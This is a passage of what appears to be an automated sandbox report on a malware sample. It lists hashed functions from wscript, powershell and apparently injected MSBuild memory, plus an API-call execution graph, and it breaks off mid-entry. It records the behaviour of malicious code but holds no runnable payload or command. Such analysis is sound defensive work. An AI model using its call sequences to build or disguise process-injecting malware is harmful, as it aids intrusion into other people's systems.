                                                                                                              • Instruction Fuzzy Hash: C0117C70528A488BFB65AF38C4AF39AB3E5FB88304F0545ADE419CB295CB79C5428F51
                                                                                                              Function 0000023761C2B26D Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: socket
                                                                                                              • String ID:
                                                                                                              • API String ID: 98920635-0
                                                                                                              • Opcode ID: 0a3178ebc698cf8a4f22abbfe3a156b37a5af2d2dc4df1d464aba0233826fa3c
                                                                                                              • Instruction ID: 783081e17b21819018104dd55da1353d3e3fda4d31cdb2078cbca3fa5f9612ea
                                                                                                              • Opcode Fuzzy Hash: 0a3178ebc698cf8a4f22abbfe3a156b37a5af2d2dc4df1d464aba0233826fa3c
                                                                                                              • Instruction Fuzzy Hash: FC018F3091CB488FDF55EF18908AB8EB3E4FB98300F0401BDE88EC7246DB3499428B51

                                                                                                              Non-executed Functions

                                                                                                              Function 02D60CEE Relevance: .6, Instructions: 573COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78e32bb081a54d25d10cc2e8d26a26326b047f3cae17d704b2fbe8752b3dde9b
                                                                                                              • Instruction ID: 9e877ad802bb43290538e6bbb2bf20746e1abb37f1d5d089cd89ef18571cf9d5
                                                                                                              • Opcode Fuzzy Hash: 78e32bb081a54d25d10cc2e8d26a26326b047f3cae17d704b2fbe8752b3dde9b
                                                                                                              • Instruction Fuzzy Hash: B632477648E3C29FD7138B7488656917FB0AE1322975E85DFC0C0CF4A3E22D995AC722
                                                                                                              Function 0000023761C33224 Relevance: .6, Instructions: 573COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b126cfd5c94aacad79e535d4cfeb91b6bfeb670680fde09895e56b682b51716
                                                                                                              • Instruction ID: d17d2d6604b84d1805d331a27aebaf329d5d3b866e55abb36e1d2715161e0f68
                                                                                                              • Opcode Fuzzy Hash: 5b126cfd5c94aacad79e535d4cfeb91b6bfeb670680fde09895e56b682b51716
                                                                                                              • Instruction Fuzzy Hash: D33226A644E7C19FD7538B74886A6917FB0AF13228B5E85DFC0C08F4A3D21D595BC722
                                                                                                              Function 02D59182 Relevance: .5, Instructions: 513COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
                                                                                                              • Instruction ID: 8e4e77ee34c0377e5969814cf3774d190571be3d419af65c0bfc494aa89b11e8
                                                                                                              • Opcode Fuzzy Hash: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
                                                                                                              • Instruction Fuzzy Hash: 8CE1E272BA86404BC70CDE18DCD26B973DAE7CA30AF59943DE8C7C7247DA3995038949
                                                                                                              Function 0000023761C2B6B8 Relevance: .5, Instructions: 513COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
                                                                                                              • Instruction ID: b70281de44877216f2730bce25772d5df65d02083799a63f61eed118fc3be2ff
                                                                                                              • Opcode Fuzzy Hash: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
                                                                                                              • Instruction Fuzzy Hash: BBE11472BA86404BC71CDE18DCD66B973DAE7CA309F19947CE4C7C7247DA28D5038949
                                                                                                              Function 02D5A0B6 Relevance: .2, Instructions: 161COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 37defaca62f9879e99dcf17c77c3bb781ac97dfb1e05a4ac65b9cb65b86c0579
                                                                                                              • Instruction ID: 0b7abc2943d8f4506869bbd5059381e2f02321d8e0f3f9651dda8af5b2d8865d
                                                                                                              • Opcode Fuzzy Hash: 37defaca62f9879e99dcf17c77c3bb781ac97dfb1e05a4ac65b9cb65b86c0579
                                                                                                              • Instruction Fuzzy Hash: AB41D0717187644B8B4CDA2D949162A77D6E7CC304F18863EFADBC7381EA74ED028786
                                                                                                              Function 0000023761C2C5EC Relevance: .2, Instructions: 161COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d6ef0a1f0eb7bae9c0ac86057c70be6f14b398792a923c10ce3462db9e019b2
                                                                                                              • Instruction ID: c0ab1fd2683eddacb115bd816c446b5fdd3919dd704194c6004dec42b94e1b57
                                                                                                              • Opcode Fuzzy Hash: 4d6ef0a1f0eb7bae9c0ac86057c70be6f14b398792a923c10ce3462db9e019b2
                                                                                                              • Instruction Fuzzy Hash: D441B0B1B18B454BDB6CD92D949622E77D6E7CD304F14463DF68BC3381D928EA038B86
                                                                                                              Function 02D4BFB2 Relevance: .1, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0bd5713dc855e4ec23ee48de20aa330b894c3cb2d70f90cca9fc99ad51232c3
                                                                                                              • Instruction ID: 82ca4e26baec87ab64752bda38127a7d5ffbd52d39454631737cab258d85ecee
                                                                                                              • Opcode Fuzzy Hash: c0bd5713dc855e4ec23ee48de20aa330b894c3cb2d70f90cca9fc99ad51232c3
                                                                                                              • Instruction Fuzzy Hash: 2641E871619B094FC728EF689081776B3E2FB85304F50462ED98BC3352EB71EC418B85
                                                                                                              Function 0000023761C1E4E8 Relevance: .1, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0bd5713dc855e4ec23ee48de20aa330b894c3cb2d70f90cca9fc99ad51232c3
                                                                                                              • Instruction ID: 040daef7b853100a3a4066e8f54bfa2d3be67398958df7439dea6f5761f0e3d8
                                                                                                              • Opcode Fuzzy Hash: c0bd5713dc855e4ec23ee48de20aa330b894c3cb2d70f90cca9fc99ad51232c3
                                                                                                              • Instruction Fuzzy Hash: C041F6B090CF0D4FEB79AE69909B77AB3E5FB84300F51052DD986C3693EA74D9038A44
                                                                                                              Function 02D59D21 Relevance: .1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2391021607.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2cd0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a02be4cc78a59b34649a58af90c87a9ca59e652df32f9f5e3922396ce0ffe3c1
                                                                                                              • Instruction ID: 6c67c62ab2ad6e1600b13d9e2dbda57238008d8fd99722dc74aed44c2ba76ab1
                                                                                                              • Opcode Fuzzy Hash: a02be4cc78a59b34649a58af90c87a9ca59e652df32f9f5e3922396ce0ffe3c1
                                                                                                              • Instruction Fuzzy Hash: CC41B5717286558BCB5CCA2C94A127A77D6E78D304F24863EF98BC3381DA74ED038AC5
                                                                                                              Function 0000023761C2C257 Relevance: .1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2399010828.0000023761BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000023761BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_23761bf0000_wscript.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a02be4cc78a59b34649a58af90c87a9ca59e652df32f9f5e3922396ce0ffe3c1
                                                                                                              • Instruction ID: 2c26bc535475dc34e7ca0816a27b137a91fc53dc3487c0460ab39e269aca16e6
                                                                                                              • Opcode Fuzzy Hash: a02be4cc78a59b34649a58af90c87a9ca59e652df32f9f5e3922396ce0ffe3c1
                                                                                                              • Instruction Fuzzy Hash: 31419371B286454BDB5CCA2C94A636E77D6E78D304F24863EF58BC33C1D934DA138A89

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B4337B5 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2364167350.00007FFD9B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B430000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b430000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                                              • Instruction ID: 4fedb9de3cff515300848983c054d2f3e4057ffc346f18ca323461134f51a45c
                                                                                                              • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                                              • Instruction Fuzzy Hash: 0001A77020CB0D4FD748EF0CE051AA6B3E0FB89324F10056DE58AC36A5DB32E882CB41

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.3%
                                                                                                              Dynamic/Decrypted Code Coverage:5.4%
                                                                                                              Signature Coverage:2.7%
                                                                                                              Total number of Nodes:148
                                                                                                              Total number of Limit Nodes:10
                                                                                                              execution_graph 92947 42fc43 92948 42fc53 92947->92948 92949 42fc59 92947->92949 92952 42ec83 92949->92952 92951 42fc7f 92955 42ce23 92952->92955 92954 42ec9e 92954->92951 92956 42ce40 92955->92956 92957 42ce4e RtlAllocateHeap 92956->92957 92957->92954 92966 425123 92969 42513c 92966->92969 92967 4251cc 92968 425184 92974 42eba3 92968->92974 92969->92967 92969->92968 92972 4251c7 92969->92972 92973 42eba3 RtlFreeHeap 92972->92973 92973->92967 92977 42ce73 92974->92977 92976 425194 92978 42ce8d 92977->92978 92979 42ce9b RtlFreeHeap 92978->92979 92979->92976 92980 42c123 92981 42c13d 92980->92981 92984 13d2df0 LdrInitializeThunk 92981->92984 92982 42c162 92984->92982 93019 424d93 93020 424daf 93019->93020 93021 424dd7 93020->93021 93022 424deb 93020->93022 93023 42cb03 NtClose 93021->93023 93024 42cb03 NtClose 93022->93024 93025 424de0 93023->93025 93026 424df4 93024->93026 93029 42ecc3 RtlAllocateHeap 93026->93029 93028 424dff 93029->93028 92985 415d03 92986 415d28 92985->92986 92991 417b53 92986->92991 92990 415d86 92992 417b77 92991->92992 92993 417bb3 LdrLoadDll 92992->92993 92994 415d5e 92992->92994 92993->92994 92994->92990 92995 4198c3 92994->92995 92996 4198f6 92995->92996 92997 41991a 92996->92997 93002 42c663 92996->93002 92997->92990 93000 41993d 93000->92997 93006 42cb03 93000->93006 93001 4199bd 93001->92990 93003 42c67d 93002->93003 93009 13d2ca0 LdrInitializeThunk 93003->93009 93004 42c6a6 93004->93000 93007 42cb1d 93006->93007 93008 42cb2b NtClose 93007->93008 93008->93001 93009->93004 93010 414383 93011 41439d 93010->93011 93012 417b53 LdrLoadDll 93011->93012 93013 4143bb 93012->93013 93014 414400 93013->93014 93015 4143ef PostThreadMessageW 93013->93015 93015->93014 93030 413e13 93033 42cd93 93030->93033 93034 42cdb0 93033->93034 93037 13d2c70 LdrInitializeThunk 93034->93037 93035 413e35 93037->93035 93038 41a913 93039 41a92b 93038->93039 93041 41a985 93038->93041 93039->93041 93042 41e853 93039->93042 93043 41e879 93042->93043 93047 41e970 93043->93047 93048 42fd73 93043->93048 93045 41e90e 93045->93047 93054 42c173 93045->93054 93047->93041 93049 42fce3 93048->93049 93050 42ec83 RtlAllocateHeap 93049->93050 93052 42fd40 93049->93052 93051 42fd1d 93050->93051 93053 42eba3 RtlFreeHeap 93051->93053 93052->93045 93053->93052 93055 42c18d 93054->93055 93058 13d2c0a 93055->93058 93056 42c1b6 93056->93047 93059 13d2c1f LdrInitializeThunk 93058->93059 93060 13d2c11 93058->93060 93059->93056 93060->93056 93061 401b77 93062 401b94 93061->93062 93065 430113 93062->93065 93068 42e753 93065->93068 93069 42e779 93068->93069 93080 4070b3 93069->93080 93071 42e78f 93072 401bcd 93071->93072 93083 41b463 93071->93083 93074 42e7ae 93075 42e7c3 93074->93075 93098 42ceb3 93074->93098 93094 428683 93075->93094 93078 42e7dd 93079 42ceb3 ExitProcess 93078->93079 93079->93072 93082 4070c0 93080->93082 93101 416803 93080->93101 93082->93071 93084 41b48f 93083->93084 93112 41b353 93084->93112 93087 41b4d4 93090 41b4f0 93087->93090 93092 42cb03 NtClose 93087->93092 93088 41b4bc 93089 42cb03 NtClose 93088->93089 93091 41b4c7 93088->93091 93089->93091 93090->93074 93091->93074 93093 41b4e6 93092->93093 93093->93074 93095 4286e4 93094->93095 93096 4286f1 93095->93096 93123 4189b3 93095->93123 93096->93078 93099 42cecd 93098->93099 93100 42cede ExitProcess 93099->93100 93100->93075 93102 416820 93101->93102 93104 416836 93102->93104 93105 42d553 93102->93105 93104->93082 93107 42d56d 93105->93107 93106 42d59c 93106->93104 93107->93106 93108 42c173 LdrInitializeThunk 93107->93108 93109 42d5f6 93108->93109 93110 42eba3 RtlFreeHeap 93109->93110 93111 42d60f 93110->93111 93111->93104 93113 41b36d 93112->93113 93117 41b449 93112->93117 93118 42c203 93113->93118 93116 42cb03 NtClose 93116->93117 93117->93087 93117->93088 93119 42c220 93118->93119 93122 13d35c0 LdrInitializeThunk 93119->93122 93120 41b43d 93120->93116 93122->93120 93124 4189dd 93123->93124 93130 418eeb 93124->93130 93131 413ff3 93124->93131 93126 418b0a 93127 42eba3 RtlFreeHeap 93126->93127 93126->93130 93128 418b22 93127->93128 93129 42ceb3 ExitProcess 93128->93129 93128->93130 93129->93130 93130->93096 93133 414013 93131->93133 93135 41407c 93133->93135 93136 41b773 93133->93136 93135->93126 93139 41b798 93136->93139 93137 414072 93137->93126 93139->93137 93140 42eba3 RtlFreeHeap 93139->93140 93141 41b5b3 LdrInitializeThunk 93139->93141 93140->93139 93141->93139 93016 419108 93017 42cb03 NtClose 93016->93017 93018 419112 93017->93018 93142 13d2b60 LdrInitializeThunk

                                                                                                              Executed Functions

                                                                                                              Function 00417B53 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 112 417b53-417b7c call 42f783 115 417b82-417b90 call 42fd83 112->115 116 417b7e-417b81 112->116 119 417ba0-417bb1 call 42e223 115->119 120 417b92-417b9d call 430023 115->120 125 417bb3-417bc7 LdrLoadDll 119->125 126 417bca-417bcd 119->126 120->119 125->126
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 169300342ec012082af8d9fc994880b487080d55fc2ea02b2f42f86782b7218c
                                                                                                              • Instruction ID: cff81ac32cb72360c3ac4950556065fa39e45470c75b7dccc426fadd218cfce5
                                                                                                              • Opcode Fuzzy Hash: 169300342ec012082af8d9fc994880b487080d55fc2ea02b2f42f86782b7218c
                                                                                                              • Instruction Fuzzy Hash: 240171B1E0420DBBDF10DBE5DC52FDEB3789B54308F4081AAE90897240F634EB588B95
                                                                                                              Function 0042CB03 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 137 42cb03-42cb39 call 404673 call 42dd33 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB34
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: c9ee12a75c3df09896fd10a5e432e13abe3670f004da60ca3f11a9296866f34f
                                                                                                              • Instruction ID: ba9035e57b49a5b789f2e9b5fc8dfb0460036ce468971b6eb964efb3b90a8674
                                                                                                              • Opcode Fuzzy Hash: c9ee12a75c3df09896fd10a5e432e13abe3670f004da60ca3f11a9296866f34f
                                                                                                              • Instruction Fuzzy Hash: 8EE04F312002147BC120AE5ADC01F97776CDBC5714F40445AFA0867242C775B90586B5
                                                                                                              Function 013D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 151 13d2b60-13d2b6c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 240f27a792cb424027b6c9d7c58fb96a90ff1f5d41115a9b2853e528bd864fa8
                                                                                                              • Instruction ID: 0732a20255fcacc2bb272d7b921ad8e6cda7bbee61c81b68d23b90f46ef8cbfe
                                                                                                              • Opcode Fuzzy Hash: 240f27a792cb424027b6c9d7c58fb96a90ff1f5d41115a9b2853e528bd864fa8
                                                                                                              • Instruction Fuzzy Hash: 85900265602510039105715C4418616404A97E0205B55C061E1014594DC53589956225
                                                                                                              Function 013D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2eee65347ea214c86e72a976bfc764c68c71ece6c91fe0f781968b33e1944c45
                                                                                                              • Instruction ID: f21f99a503d12b3c22a35ffec948b3d191093d200eebf500980f951a579f6247
                                                                                                              • Opcode Fuzzy Hash: 2eee65347ea214c86e72a976bfc764c68c71ece6c91fe0f781968b33e1944c45
                                                                                                              • Instruction Fuzzy Hash: A190023560151413E111715C4508707004997D0245F95C452A042455CDD6668A56A221
                                                                                                              Function 013D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 152 13d2c70-13d2c7c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 9d7bf09c89eae3e4abfa639f127152bdafd52cf8ee3327c609547adb33bb7974
                                                                                                              • Instruction ID: 3fa071f6f3fbf6c24c97f3ceaafda12b4e46bc9afae37ed23931636b5101143a
                                                                                                              • Opcode Fuzzy Hash: 9d7bf09c89eae3e4abfa639f127152bdafd52cf8ee3327c609547adb33bb7974
                                                                                                              • Instruction Fuzzy Hash: 1A90023560159802E110715C840874A004597D0305F59C451A442465CDC6A589957221
                                                                                                              Function 013D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 34a1cf7ff0c89bd3170d1173f4362e06e7a14abc1c1ca2a3a22197739de21dac
                                                                                                              • Instruction ID: be862fdfab40529157df249ea339e7e8ba1d88f151b8d38f3d2b2dbcd6d62f74
                                                                                                              • Opcode Fuzzy Hash: 34a1cf7ff0c89bd3170d1173f4362e06e7a14abc1c1ca2a3a22197739de21dac
                                                                                                              • Instruction Fuzzy Hash: 0290023560151402E100759C540C646004597E0305F55D051A5024559EC67589956231
                                                                                                              Function 013D2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 12b6dd8b11fd0db968269b61f39c3c1c5f744502c217653530f30ea8e8df22c9
                                                                                                              • Instruction ID: 7c01e4619bf2a3fff20f2f4117781bc879113ef336e220b3c31731c4725751dc
                                                                                                              • Opcode Fuzzy Hash: 12b6dd8b11fd0db968269b61f39c3c1c5f744502c217653530f30ea8e8df22c9
                                                                                                              • Instruction Fuzzy Hash: E090023560191402E100715C481870B004597D0306F55C051A1164559DC63589556671
                                                                                                              Function 013D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 51399ac9ffb2b243c77b739eb374c92c8ff43453cef1f0721fbb0632191dd371
                                                                                                              • Instruction ID: 5e027a6dff10189659c13b6745c2c46691b65f1c396b721cfe3564878da34af1
                                                                                                              • Opcode Fuzzy Hash: 51399ac9ffb2b243c77b739eb374c92c8ff43453cef1f0721fbb0632191dd371
                                                                                                              • Instruction Fuzzy Hash: 21900235A0561402E100715C4518706104597D0205F65C451A042456CDC7A58A5566A2
                                                                                                              Function 00414378 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(4789071F,00000111,00000000,00000000), ref: 004143FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 4789071F$4789071F$#U
                                                                                                              • API String ID: 1836367815-4022187411
                                                                                                              • Opcode ID: bdc1de7847b4fb16345e3f794f62c053428f8a759900698bcce9c4fc26c12a83
                                                                                                              • Instruction ID: 0e2d3ecc4f3d0f07fd2a09dab770b023fbfbb3c6726e30d271a355b0b5feb86e
                                                                                                              • Opcode Fuzzy Hash: bdc1de7847b4fb16345e3f794f62c053428f8a759900698bcce9c4fc26c12a83
                                                                                                              • Instruction Fuzzy Hash: 9D11E9B2D0115C7EDB11ABE19C82DEF7B7CDF80758F448069FA1467241D5384E0687E1
                                                                                                              Function 00414308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 14 414308-414316 15 414366-41436e 14->15 16 414318-414324 14->16 17 414370-414377 15->17 18 4143ce-4143ed 15->18 19 414380-414395 16->19 20 414326-414338 16->20 25 41440d-414413 18->25 26 4143ef-4143fe PostThreadMessageW 18->26 21 41439d-4143c2 call 42f653 call 417b53 call 4045e3 19->21 22 414398 call 42ec43 19->22 23 414307 20->23 24 41433a-41433e 20->24 38 4143c7-4143ed call 425263 21->38 22->21 23->14 28 414340-414342 24->28 29 4143b8-4143bb 24->29 26->25 30 414400-41440a 26->30 32 4143bd-4143c0 28->32 33 414344 28->33 29->32 30->25 32->38 39 4143c2 call 4045e3 32->39 33->15 38->25 38->26 39->38
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(4789071F,00000111,00000000,00000000), ref: 004143FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
